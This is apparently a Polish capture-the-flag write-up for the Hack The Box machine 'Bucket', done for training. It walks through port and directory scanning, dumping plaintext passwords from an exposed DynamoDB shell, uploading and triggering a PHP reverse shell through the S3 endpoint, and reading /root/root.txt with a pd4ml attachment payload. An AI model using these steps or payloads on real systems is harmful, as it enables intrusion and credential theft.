Bucket

Nmap

nmap -sC -sV -p- -T4 10.129.27.96
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-17 20:01 BST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 20:02 (0:00:14 remaining)
Nmap scan report for 10.129.27.96
Host is up, received echo-reply ttl 63 (0.035s latency).
Not shown: 64882 closed ports, 651 filtered ports
Reason: 64882 resets and 651 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT  STATE SERVICE REASON     VERSION
22/tcp open ssh   syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open ssl/http syn-ack ttl 63 Apache/2.4.41 (Ubuntu)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

User

W source-code strony widać odnośniki do s3.bucket.htb dodajemy wpis do /etc/hosts

Następnie sprawdzamy katalogi ponieważ na głównej stronie nic nie widać.

ffuf -fc 403 -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://s3.bucket.htb/FUZZ                                                                                                                        

    /'___\ /'___\      /'___\    
    /\ \__/ /\ \__/ __ __ /\ \__/    
    \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\   
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/   
     \ \_\  \ \_\ \ \____/ \ \_\    
     \/_/  \/_/  \/___/  \/_/    

    v1.0.2
________________________________________________

 :: Method      : GET
 :: URL       : http://s3.bucket.htb/FUZZ
 :: Follow redirects : false
 :: Calibration   : false
 :: Timeout     : 10
 :: Threads     : 40
 :: Matcher     : Response status: 200,204,301,302,307,401,403
 :: Filter      : Response status: 403
________________________________________________

health         [Status: 200, Size: 54, Words: 5, Lines: 1]
shell          [Status: 200, Size: 0, Words: 1, Lines: 1]

Po wejściu do katalogu shell widać DynamoDB JavaScript Shell tam możemy robić zapytania do bazy danych. Pierwsze co robimy to wyciągamy użytkowników.

var params = {
  ExclusiveStartTableName: 'table_name',
};
dynamodb.listTables(params, function(err, data) {
  if (err) ppJson(err); 
  else ppJson(data);
});

var params = {
  TableName: 'users',
};
dynamodb.scan(params, function(err, data) {
  if (err) ppJson(err);
  else ppJson(data);
});
{
  "Items": [
    {
      "password": {
        "S": "Management@#1@#"
      },
      "username": {
        "S": "Mgmt"
      }
    },
    {
      "password": {
        "S": "Welcome123!"
      },
      "username": {
        "S": "Cloudadm"
      }
    },
    {
      "password": {
        "S": "n2vM-<_K_Q:.Aa2"
      },
      "username": {
        "S": "Sysadm"
      }
    }
  ],
  "Count": 3,
  "ScannedCount": 3
}

Następnie trzeba doinstalować awscli i je skonfigurować.

apt install awscli

aws configure                                 
AWS Access Key ID [None]: asd
AWS Secret Access Key [None]: asd
Default region name [None]: asd
Default output format [None]: asd

Po skonfigurowaniu trzeba wrzucić reverse-shell.php na serwer.

aws s3 --endpoint-url http://s3.bucket.htb/ cp ./rev.php s3://adserver/rev.php

Trzeba uruchomić plik odwołując się do niego. (Jest trochę niestabilnie więc w moim przypadku po 20 razie się udało do niego odwołać).

curl http://bucket.htb/rev.php 

W rev-shell’u mamy uprawnienia www-data i widzimy, że jest użytkownik roy na którego możemy się zalogować su lub ssh z hasłem znalezionym wcześniej.

ssh roy@bucket.htb
n2vM-<_K_Q:.Aa2

cat user.txt
4ac595296be3***f6672b73ad37

Root

Zdobycie roota nie było takie banalne.
Ostatecznie widzimy przy pomocy pspy, że root robi różne operacje z katalogiem /var/www/bucket-app
W index.php mamy kod, w którym jest napisane co mamy zrobić.

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
    if($_POST["action"]==="get_alerts") {
        date_default_timezone_set('America/New_York');
        $client = new DynamoDbClient([
            'profile' => 'default',
            'region' => 'us-east-1',
            'version' => 'latest',
            'endpoint' => 'http://localhost:4566'
        ]);

        $iterator = $client->getIterator('Scan', array(
            'TableName' => 'alerts',
            'FilterExpression' => "title = :title",
            'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
        ));

        foreach ($iterator as $item) {
            $name=rand(1,10000).'.html';
            file_put_contents('files/'.$name,$item["data"]);
        }
        passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
    }
}
else
{
}
?>

W skrócie:
1. Trzeba dodać tabelę o nazwie “alerts” i parametrze ‘title’: ‘Ransomware’ przy pomocy http://s3.bucket.htb/shell,
2. W polu data tworzony jest pdf przy pomocy pd4ml
3. Trzeba odwołać się POST’em z parametrem “action=get_alerts”
4. Ściągnąć utworzony plik /var/www/bucket-app/files/result.pdf

1. Tworzenie tabeli

var params = {
  TableName: 'alerts',
  KeySchema: [ 
    { 
      AttributeName: 'title', 
      KeyType: 'HASH', 
    },
    {
      AttributeName: 'data', 
      KeyType: 'RANGE', 
    }
  ],
  AttributeDefinitions: [
    {
      AttributeName: 'title',
      AttributeType: 'S',
    },
    {
      AttributeName: 'data',
      AttributeType: 'S',
    },
  ],
  ProvisionedThroughput: {
    ReadCapacityUnits: 1, 
    WriteCapacityUnits: 1, 
  }
};
dynamodb.createTable(params, function(err, data) {
  if (err) ppJson(err);
  else ppJson(data);

  var params = {
    TableName: 'alerts',
    Item: {
    'data': '<PAYLOAD>',
    'title': 'Ransomware'
    }
  };
  docClient.put(params, function(err, data) {
    if (err) ppJson(err);
    else ppJson(data);
  });

});

2. Pole Data

W polu data wpisujemy:
<pd4ml:attachment description="attached.txt" icon="PushPin">file:///root/root.txt</pd4ml:attachment>

powyższy wpis wziąłem z twittera

3. Odwołanie do serwera

curl -X POST http://localhost:8000/index.php -d 'action=get_alerts'

4. Ściągnięcie pliku z flagą

Następnie ściągamy plik result.pdf i odczytujemy flagę

64cddf858c703***10dfd4c96b

Leave a Comment